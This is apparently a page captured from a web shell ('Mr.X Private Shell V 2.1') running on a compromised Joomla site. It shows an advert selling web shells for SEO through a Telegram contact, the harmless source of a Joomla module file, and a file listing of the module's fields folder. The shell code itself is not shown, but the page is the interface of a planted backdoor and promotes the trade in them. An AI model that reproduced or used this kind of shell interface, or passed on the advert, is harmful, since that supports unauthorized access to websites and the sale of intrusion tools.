__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
*
* @version See field version manifest file
* @package See field name manifest file
* @author Gregorio Nuti
* @copyright See field copyright manifest file
* @license GNU General Public License version 2 or later
*
*/
// no direct access
defined('_JEXEC') or die;
// define ds variable for joomla 3 compatibility
if(!defined('DS')) define('DS', DIRECTORY_SEPARATOR);
jimport('joomla.form.formfield');
class JFormFieldAsset extends JFormField {
protected $type = 'Asset';
protected function getLabel() {
return;
}
protected function getInput() {
// human defined variables
$extension_family = 'modules';
$extension_name = 'mod_digi_showcase';
// general variables
$uri = JUri::getInstance();
$document = JFactory::getDocument();
// load jquery in joomla 4
$joomlaVersion = JVERSION;
if ($joomlaVersion >= '4') {
$wa = JFactory::getApplication()->getDocument()->getWebAssetManager();
$wa->useScript('jquery');
}
$document->addScript(JURI::root().$extension_family.DS.$extension_name.DS.'extras'.DS.'asset.js');
$document->addStyleSheet(JURI::root().$extension_family.DS.$extension_name.DS.'extras'.DS.'asset.css');
return;
}
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| asset.php | File | 1.33 KB | 0664 |
|
| buttons.php | File | 4.78 KB | 0664 |
|
| digishowcaseadv.php | File | 5.87 KB | 0664 |
|
| digishowcaseeds.php | File | 5.37 KB | 0664 |
|
| digishowcasewizard.php | File | 18.02 KB | 0664 |
|
| digishowcasextd.php | File | 5.2 KB | 0664 |
|
| donation.php | File | 7.56 KB | 0664 |
|
| interval.php | File | 2.68 KB | 0664 |
|
| size.php | File | 2.81 KB | 0664 |
|
| support.php | File | 4.39 KB | 0664 |
|
| textareacsv.php | File | 5.39 KB | 0664 |
|
| xml.php | File | 3.03 KB | 0664 |
|